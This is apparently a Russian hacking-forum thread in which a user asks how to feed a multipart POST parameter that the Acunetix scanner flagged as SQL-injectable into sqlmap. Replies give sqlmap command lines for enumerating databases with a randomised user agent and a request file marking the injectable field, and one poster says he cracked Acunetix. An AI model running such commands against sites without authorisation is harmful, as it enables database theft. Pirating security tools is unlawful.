acunetix нашел sql в пост запросе пост дата Accept: */* -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="act" idx -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="chk" on -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="code" 01 -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="fid" В первые вижу,уязвимый параметр fid.Как записать в sqlmap?
пишите в ветку "вопросы по sqlmap" - https://forum.antichat.ru/threads/431199/ примерно такой запрос python sqlmap.py -u 'target host' --data="fld=1" --dbs --random-agent также помогает чтение help, там эта инфа есть Code: $ python sqlmap.py --help | grep -i post --data=DATA Data string to be sent through POST --safe-post=SAFE.. POST data to send to a safe URL -------------------- вероятно поля только нужно все передавать, то есть act=1&chk=1 etc
Это так называемый multipart запрос, который передается в мап через текстовый файл с подобным содержимым: Code: POST /evil.php HTTP/1.1 Host: site.com Content-Type: multipart/form-data; boundary=-------AcunetixBoundary_XRGQBWWRUS -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="act" idx -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="chk" on -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="code" 01 -------AcunetixBoundary_XRGQBWWRUS Content-Disposition: form-data; name="fid" * Ставите ваш сайт в строку Host, ваш запрос в поле Post, а мультипарт вставляете в самом конце, отметив уязвимый параметр *. И тогда будет примерно такой запрос: sqlmap.py -r "C:\site.txt" --random-ag
Да уж, я погляжу программа не для средних умов. Установил самую последнюю версию 10.5, легко крякнул....и всё. Полный бумбум. Просканировал им сайт и ничего не понял. Может русификатор есть какой, мож по русски как то что то будет доходчиво.